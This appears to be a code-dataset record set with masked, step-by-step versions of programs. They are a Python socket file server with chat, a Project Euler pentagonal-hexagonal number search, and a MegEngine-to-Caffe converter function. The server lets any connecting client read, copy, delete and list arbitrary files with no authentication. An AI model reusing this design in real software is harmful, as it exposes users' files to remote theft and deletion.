Size Delivered!')\n file_to_send = open(directory, 'rb')\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print('Delete successfully!')\n except:\n self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print('File not found!')\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass server:\n\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock = socket.socket()\n self.chatPort = 8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host, self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n self.filename = ''\n print('Waiting for a connection.....')\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock, self.chatAddr = self.chatSock.accept()\n print('Got a transfer connection from %s' % str(self.transferAddr))\n print('Got a command connection from %s' % str(self.commandAddr))\n print('Got a chat connection from %s' % str(self.chatAddr))\n self.sendPartitions()\n self.clientCommandSock.send('Partitions Sent'.encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n <mask token>\n\n def chat(self):\n self.chatfile = open('chatfile.txt', 'w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message + '\\n')\n self.chatfile.close()\n print(self.message)\n\n def mkdir(self):\n self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.mkdir(self.mkdirPath)\n self.clientCommandSock.send('Directory Made'.encode('utf-8'))\n print('Directory Made Successfully!')\n except:\n self.clientCommandSock.send('Directory Already Exist'.encode(\n 'utf-8'))\n print('Directory Already Exist')\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename = self.filename.decode('utf-8')\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print('Delete successfully!')\n except:\n 
self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print('File not found!')\n <mask token>\n <mask token>\n <mask token>\n\n def listdir(self):\n self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))\n self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath\n )))).encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Size Received':\n print('Waiting for Listdir Size to deliver...')\n time.sleep(1)\n else:\n print('Listdir Size Delivered!')\n self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).\n encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Received':\n print('Waiting for Listdir to deliver...')\n time.sleep(1)\n else:\n print('Listdir Delivered!')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass server:\n\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock = socket.socket()\n self.chatPort = 8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host, self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n self.filename = ''\n print('Waiting for a connection.....')\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock, self.chatAddr = self.chatSock.accept()\n print('Got a transfer connection from %s' % str(self.transferAddr))\n print('Got a command connection from %s' % str(self.commandAddr))\n print('Got a chat connection from %s' % str(self.chatAddr))\n self.sendPartitions()\n self.clientCommandSock.send('Partitions Sent'.encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n <mask token>\n\n def chat(self):\n self.chatfile = open('chatfile.txt', 'w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message + '\\n')\n self.chatfile.close()\n print(self.message)\n\n def mkdir(self):\n self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.mkdir(self.mkdirPath)\n self.clientCommandSock.send('Directory Made'.encode('utf-8'))\n print('Directory Made Successfully!')\n except:\n self.clientCommandSock.send('Directory Already Exist'.encode(\n 'utf-8'))\n print('Directory Already Exist')\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename = self.filename.decode('utf-8')\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print('Delete successfully!')\n except:\n 
self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print('File not found!')\n\n def copy(self):\n self.pathes = self.clientCommandSock.recv(128).decode('utf-8').split(\n ',')\n print(self.pathes)\n try:\n shutil.copy2(self.pathes[0], self.pathes[1])\n self.clientCommandSock.send('File Copied'.encode('utf-8'))\n print('Copied successfully!')\n except:\n self.clientCommandSock.send('File Not Found or Access Denied'.\n encode('utf-8'))\n print('File Not Found or Access Denied')\n <mask token>\n\n def sendPartitions(self):\n self.dps_defualt = psutil.disk_partitions()\n fmt_str = '{:<8}'\n fmt_str.format('Opts')\n self.dps = [(chr(x) + ':') for x in range(65, 90) if os.path.exists\n (chr(x) + ':')]\n self.clientCommandSock.send(str(self.dps).encode('utf-8'))\n\n def listdir(self):\n self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))\n self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath\n )))).encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Size Received':\n print('Waiting for Listdir Size to deliver...')\n time.sleep(1)\n else:\n print('Listdir Size Delivered!')\n self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).\n encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Received':\n print('Waiting for Listdir to deliver...')\n time.sleep(1)\n else:\n print('Listdir Delivered!')\n\n\n<mask token>\n",
"step-4": "import socket\nimport threading\nimport os\nimport time\nimport psutil\nimport shutil\n\n\nclass server:\n\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock = socket.socket()\n self.chatPort = 8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host, self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n self.filename = ''\n print('Waiting for a connection.....')\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock, self.chatAddr = self.chatSock.accept()\n print('Got a transfer connection from %s' % str(self.transferAddr))\n print('Got a command connection from %s' % str(self.commandAddr))\n print('Got a chat connection from %s' % str(self.chatAddr))\n self.sendPartitions()\n self.clientCommandSock.send('Partitions Sent'.encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n\n def dicision(self):\n while True:\n self.message = self.clientCommandSock.recv(32).decode('utf-8')\n if self.message == 'Delete Request':\n self.clientCommandSock.send('Delete Request Received'.\n encode('utf-8'))\n self.delete()\n elif self.message == 'Copy Request':\n self.clientCommandSock.send('Copy Request Received'.encode(\n 'utf-8'))\n self.copy()\n elif self.message == 'Send File Request':\n self.clientCommandSock.send('Send File Request Received'.\n encode('utf-8'))\n self.sendFile()\n elif self.message == 'Listdir Request':\n self.clientCommandSock.send('Listdir Request Received'.\n encode('utf-8'))\n self.listdir()\n elif self.message == 'Chat Request':\n self.clientCommandSock.send('Chat Request Received'.encode(\n 'utf-8'))\n self.chat()\n elif self.message == 'Mkdir Request':\n self.clientCommandSock.send('Mkdir Request Received'.encode\n ('utf-8'))\n self.mkdir()\n\n def chat(self):\n self.chatfile = open('chatfile.txt', 'w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message + '\\n')\n self.chatfile.close()\n print(self.message)\n\n def mkdir(self):\n self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.mkdir(self.mkdirPath)\n self.clientCommandSock.send('Directory Made'.encode('utf-8'))\n print('Directory Made Successfully!')\n except:\n self.clientCommandSock.send('Directory Already Exist'.encode(\n 'utf-8'))\n print('Directory Already Exist')\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename 
= self.filename.decode('utf-8')\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print('Delete successfully!')\n except:\n self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print('File not found!')\n\n def copy(self):\n self.pathes = self.clientCommandSock.recv(128).decode('utf-8').split(\n ',')\n print(self.pathes)\n try:\n shutil.copy2(self.pathes[0], self.pathes[1])\n self.clientCommandSock.send('File Copied'.encode('utf-8'))\n print('Copied successfully!')\n except:\n self.clientCommandSock.send('File Not Found or Access Denied'.\n encode('utf-8'))\n print('File Not Found or Access Denied')\n\n def sendFile(self):\n self.sendFileDirectory = self.clientCommandSock.recv(128).decode(\n 'utf-8')\n self.clientCommandSock.send('File Directory Received'.encode('utf-8'))\n threading.Thread(target=self.send, args=(self.sendFileDirectory,)\n ).start()\n\n def sendPartitions(self):\n self.dps_defualt = psutil.disk_partitions()\n fmt_str = '{:<8}'\n fmt_str.format('Opts')\n self.dps = [(chr(x) + ':') for x in range(65, 90) if os.path.exists\n (chr(x) + ':')]\n self.clientCommandSock.send(str(self.dps).encode('utf-8'))\n\n def listdir(self):\n self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))\n self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath\n )))).encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Size Received':\n print('Waiting for Listdir Size to deliver...')\n time.sleep(1)\n else:\n print('Listdir Size Delivered!')\n self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).\n encode('utf-8'))\n while self.clientCommandSock.recv(32).decode('utf-8'\n ) != 'Listdir Received':\n print('Waiting for Listdir to deliver...')\n time.sleep(1)\n else:\n print('Listdir Delivered!')\n\n\nif __name__ == '__main__':\n myServer = server()\n threading.Thread(target=myServer.dicision()).start()\n",
"step-5": "import socket\nimport threading\nimport os\nimport time\nimport psutil\nimport shutil\n\n\n\nclass server:\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock=socket.socket()\n self.chatPort=8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host,self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n\n self.filename = \"\"\n print (\"Waiting for a connection.....\")\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock , self.chatAddr = self.chatSock.accept()\n\n print(\"Got a transfer connection from %s\" % str(self.transferAddr))\n print(\"Got a command connection from %s\" % str(self.commandAddr))\n print(\"Got a chat connection from %s\" % str(self.chatAddr))\n\n self.sendPartitions()\n self.clientCommandSock.send(('Partitions Sent').encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n\n def dicision(self):\n while True:\n self.message = (self.clientCommandSock.recv(32)).decode('utf-8')\n #(self.message)\n if self.message == 'Delete Request':\n self.clientCommandSock.send('Delete Request Received'.encode('utf-8'))\n self.delete()\n elif self.message == 'Copy Request':\n self.clientCommandSock.send('Copy Request Received'.encode('utf-8'))\n self.copy()\n elif self.message == 'Send File Request':\n self.clientCommandSock.send('Send File Request Received'.encode('utf-8'))\n self.sendFile()\n elif self.message == 'Listdir Request':\n self.clientCommandSock.send('Listdir Request Received'.encode('utf-8'))\n self.listdir()\n elif self.message == 'Chat Request':\n self.clientCommandSock.send('Chat Request Received'.encode('utf-8'))\n self.chat()\n elif self.message == 'Mkdir Request':\n self.clientCommandSock.send('Mkdir Request Received'.encode('utf-8'))\n self.mkdir()\n\n def chat(self):\n self.chatfile=open('chatfile.txt','w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message+'\\n')\n self.chatfile.close()\n print(self.message)\n\n def mkdir(self):\n self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.mkdir(self.mkdirPath)\n self.clientCommandSock.send('Directory Made'.encode('utf-8'))\n print ('Directory Made Successfully!')\n except:\n self.clientCommandSock.send('Directory Already Exist'.encode('utf-8'))\n print ('Directory Already Exist')\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while (self.clientTransferSock.recv(32)).decode('utf-8') != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n 
self.filename = self.filename.decode('utf-8')\n\n # filename = os.path.join(path,filename)\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File Size Delivered!')\n file_to_send = open(directory, 'rb')\n\n lines = file_to_send.read()\n self.clientTransferSock.sendall(lines)\n file_to_send.close()\n\n while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Received':\n print('Waiting for File to deliver...')\n time.sleep(1)\n else:\n print('File Delivered Successfully!')\n\n def delete(self):\n self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n try:\n os.remove(self.deleteDirectory)\n self.clientCommandSock.send('File Deleted'.encode('utf-8'))\n print ('Delete successfully!')\n except:\n self.clientCommandSock.send('File Not Found'.encode('utf-8'))\n print ('File not found!')\n\n def copy(self):\n self.pathes = (self.clientCommandSock.recv(128).decode('utf-8')).split(',')\n print(self.pathes)\n #shutil.copy2(self.pathes[0], self.pathes[1])\n try:\n shutil.copy2(self.pathes[0], self.pathes[1])\n self.clientCommandSock.send('File Copied'.encode('utf-8'))\n print ('Copied successfully!')\n except:\n self.clientCommandSock.send('File Not Found or Access Denied'.encode('utf-8'))\n print ('File Not Found or Access Denied')\n\n def sendFile(self):\n self.sendFileDirectory = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('File Directory Received'.encode('utf-8'))\n threading.Thread(target=self.send, args=(self.sendFileDirectory,)).start()\n\n def sendPartitions(self):\n self.dps_defualt = psutil.disk_partitions()\n fmt_str = \"{:<8}\"\n fmt_str.format(\"Opts\")\n self.dps = [chr(x) + \":\" for x in range(65, 90) if os.path.exists(chr(x) + \":\")]\n self.clientCommandSock.send((str(self.dps)).encode('utf-8'))\n\n def listdir(self):\n\n self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')\n self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))\n self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath)))).encode('utf-8'))\n while (self.clientCommandSock.recv(32)).decode('utf-8') != 'Listdir Size Received':\n print('Waiting for Listdir Size to deliver...')\n time.sleep(1)\n else:\n print('Listdir Size Delivered!')\n self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).encode('utf-8'))\n while (self.clientCommandSock.recv(32)).decode('utf-8') != 'Listdir Received':\n print('Waiting for Listdir to deliver...')\n time.sleep(1)\n else:\n print('Listdir Delivered!')\n\n\n\nif __name__ == '__main__':\n myServer = server()\n threading.Thread(target=myServer.dicision()).start()\n\n",
"step-ids": [
7,
9,
11,
15,
16
]
}
|
[
7,
9,
11,
15,
16
] |
import math
import time
t1 = time.time()
# n(3n-1)/2
def isPentagon(item):
num = math.floor(math.sqrt(item*2//3))+1
if num*(3*num-1)//2 == item:
return True
return False
# n(2n-1)
def isHexagon(item):
num = math.floor(math.sqrt(item//2))+1
if num*(2*num-1) == item:
return True
return False
i = 285
t = 0
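# T(285) = 40755 is the known triangle/pentagon/hexagon number, so the search starts from the next triangle number T(i) = i*(i+1)/2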
while t == 0:
i += 1
n = i*(i+1)//2
if isPentagon(n) and isHexagon(n):
t = 1
print (n)
print("time:",time.time()-t1)
|
normal
|
{
"blob_id": "0aec3fbc9f4b9f33aee021fa417c43f0feb0e3d1",
"index": 3296,
"step-1": "<mask token>\n\n\ndef isPentagon(item):\n num = math.floor(math.sqrt(item * 2 // 3)) + 1\n if num * (3 * num - 1) // 2 == item:\n return True\n return False\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef isPentagon(item):\n num = math.floor(math.sqrt(item * 2 // 3)) + 1\n if num * (3 * num - 1) // 2 == item:\n return True\n return False\n\n\ndef isHexagon(item):\n num = math.floor(math.sqrt(item // 2)) + 1\n if num * (2 * num - 1) == item:\n return True\n return False\n\n\n<mask token>\nwhile t == 0:\n i += 1\n n = i * (i + 1) // 2\n if isPentagon(n) and isHexagon(n):\n t = 1\n print(n)\nprint('time:', time.time() - t1)\n",
"step-3": "<mask token>\nt1 = time.time()\n\n\ndef isPentagon(item):\n num = math.floor(math.sqrt(item * 2 // 3)) + 1\n if num * (3 * num - 1) // 2 == item:\n return True\n return False\n\n\ndef isHexagon(item):\n num = math.floor(math.sqrt(item // 2)) + 1\n if num * (2 * num - 1) == item:\n return True\n return False\n\n\ni = 285\nt = 0\nwhile t == 0:\n i += 1\n n = i * (i + 1) // 2\n if isPentagon(n) and isHexagon(n):\n t = 1\n print(n)\nprint('time:', time.time() - t1)\n",
"step-4": "import math\nimport time\nt1 = time.time()\n\n\ndef isPentagon(item):\n num = math.floor(math.sqrt(item * 2 // 3)) + 1\n if num * (3 * num - 1) // 2 == item:\n return True\n return False\n\n\ndef isHexagon(item):\n num = math.floor(math.sqrt(item // 2)) + 1\n if num * (2 * num - 1) == item:\n return True\n return False\n\n\ni = 285\nt = 0\nwhile t == 0:\n i += 1\n n = i * (i + 1) // 2\n if isPentagon(n) and isHexagon(n):\n t = 1\n print(n)\nprint('time:', time.time() - t1)\n",
"step-5": "import math\nimport time\n\nt1 = time.time()\n\n# n(3n-1)/2\ndef isPentagon(item):\n num = math.floor(math.sqrt(item*2//3))+1\n if num*(3*num-1)//2 == item:\n return True\n return False\n\n# n(2n-1)\ndef isHexagon(item):\n num = math.floor(math.sqrt(item//2))+1\n if num*(2*num-1) == item:\n return True\n return False\n\n\ni = 285\nt = 0\nwhile t == 0:\n i += 1\n n = i*(i+1)//2\n if isPentagon(n) and isHexagon(n):\n t = 1\n print (n)\n\nprint(\"time:\",time.time()-t1)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mge_to_caffe(mge_fpath, prototxt='out.prototxt', caffemodel=
'out.caffemodel', outspec=None, use_empty_blobs=False):
assert isinstance(mge_fpath, str), 'mge_fpath must be string'
irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()
transformer_options = [TransformerRule.EXPAND_MUL_ADD3, TransformerRule
.FUSE_FOR_LEAKY_RELU]
transformer = IRTransform(transformer_options)
transformed_irgraph = transformer.transform(irgraph)
converter = CaffeConverter(transformed_irgraph, use_empty_blobs)
converter.convert()
assert isinstance(prototxt, str) and isinstance(caffemodel, str
), "'prototxt' and 'caffemodel' must be string"
converter.dump(prototxt, caffemodel)
<|reserved_special_token_1|>
from ..backend.ir_to_caffe import CaffeConverter
from ..converter_ir.ir_transform import IRTransform, TransformerRule
from ..frontend.mge_to_ir import MGE_FrontEnd
def mge_to_caffe(mge_fpath, prototxt='out.prototxt', caffemodel=
'out.caffemodel', outspec=None, use_empty_blobs=False):
assert isinstance(mge_fpath, str), 'mge_fpath must be string'
irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()
transformer_options = [TransformerRule.EXPAND_MUL_ADD3, TransformerRule
.FUSE_FOR_LEAKY_RELU]
transformer = IRTransform(transformer_options)
transformed_irgraph = transformer.transform(irgraph)
converter = CaffeConverter(transformed_irgraph, use_empty_blobs)
converter.convert()
assert isinstance(prototxt, str) and isinstance(caffemodel, str
), "'prototxt' and 'caffemodel' must be string"
converter.dump(prototxt, caffemodel)
<|reserved_special_token_1|>
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
from ..backend.ir_to_caffe import CaffeConverter
from ..converter_ir.ir_transform import IRTransform, TransformerRule
from ..frontend.mge_to_ir import MGE_FrontEnd
def mge_to_caffe(
mge_fpath,
prototxt="out.prototxt",
caffemodel="out.caffemodel",
outspec=None,
use_empty_blobs=False,
):
assert isinstance(mge_fpath, str), "mge_fpath must be string"
irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()
transformer_options = [
TransformerRule.EXPAND_MUL_ADD3,
TransformerRule.FUSE_FOR_LEAKY_RELU,
]
transformer = IRTransform(transformer_options)
transformed_irgraph = transformer.transform(irgraph)
converter = CaffeConverter(transformed_irgraph, use_empty_blobs)
converter.convert()
assert isinstance(prototxt, str) and isinstance(
caffemodel, str
), "'prototxt' and 'caffemodel' must be string"
converter.dump(prototxt, caffemodel)
|
flexible
|
{
"blob_id": "a83230e71cc1bcc843d00487746f16114d304eec",
"index": 4908,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef mge_to_caffe(mge_fpath, prototxt='out.prototxt', caffemodel=\n 'out.caffemodel', outspec=None, use_empty_blobs=False):\n assert isinstance(mge_fpath, str), 'mge_fpath must be string'\n irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()\n transformer_options = [TransformerRule.EXPAND_MUL_ADD3, TransformerRule\n .FUSE_FOR_LEAKY_RELU]\n transformer = IRTransform(transformer_options)\n transformed_irgraph = transformer.transform(irgraph)\n converter = CaffeConverter(transformed_irgraph, use_empty_blobs)\n converter.convert()\n assert isinstance(prototxt, str) and isinstance(caffemodel, str\n ), \"'prototxt' and 'caffemodel' must be string\"\n converter.dump(prototxt, caffemodel)\n",
"step-3": "from ..backend.ir_to_caffe import CaffeConverter\nfrom ..converter_ir.ir_transform import IRTransform, TransformerRule\nfrom ..frontend.mge_to_ir import MGE_FrontEnd\n\n\ndef mge_to_caffe(mge_fpath, prototxt='out.prototxt', caffemodel=\n 'out.caffemodel', outspec=None, use_empty_blobs=False):\n assert isinstance(mge_fpath, str), 'mge_fpath must be string'\n irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()\n transformer_options = [TransformerRule.EXPAND_MUL_ADD3, TransformerRule\n .FUSE_FOR_LEAKY_RELU]\n transformer = IRTransform(transformer_options)\n transformed_irgraph = transformer.transform(irgraph)\n converter = CaffeConverter(transformed_irgraph, use_empty_blobs)\n converter.convert()\n assert isinstance(prototxt, str) and isinstance(caffemodel, str\n ), \"'prototxt' and 'caffemodel' must be string\"\n converter.dump(prototxt, caffemodel)\n",
"step-4": "# MegEngine is Licensed under the Apache License, Version 2.0 (the \"License\")\n#\n# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nfrom ..backend.ir_to_caffe import CaffeConverter\nfrom ..converter_ir.ir_transform import IRTransform, TransformerRule\nfrom ..frontend.mge_to_ir import MGE_FrontEnd\n\n\ndef mge_to_caffe(\n mge_fpath,\n prototxt=\"out.prototxt\",\n caffemodel=\"out.caffemodel\",\n outspec=None,\n use_empty_blobs=False,\n):\n assert isinstance(mge_fpath, str), \"mge_fpath must be string\"\n irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()\n\n transformer_options = [\n TransformerRule.EXPAND_MUL_ADD3,\n TransformerRule.FUSE_FOR_LEAKY_RELU,\n ]\n transformer = IRTransform(transformer_options)\n transformed_irgraph = transformer.transform(irgraph)\n\n converter = CaffeConverter(transformed_irgraph, use_empty_blobs)\n converter.convert()\n\n assert isinstance(prototxt, str) and isinstance(\n caffemodel, str\n ), \"'prototxt' and 'caffemodel' must be string\"\n converter.dump(prototxt, caffemodel)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
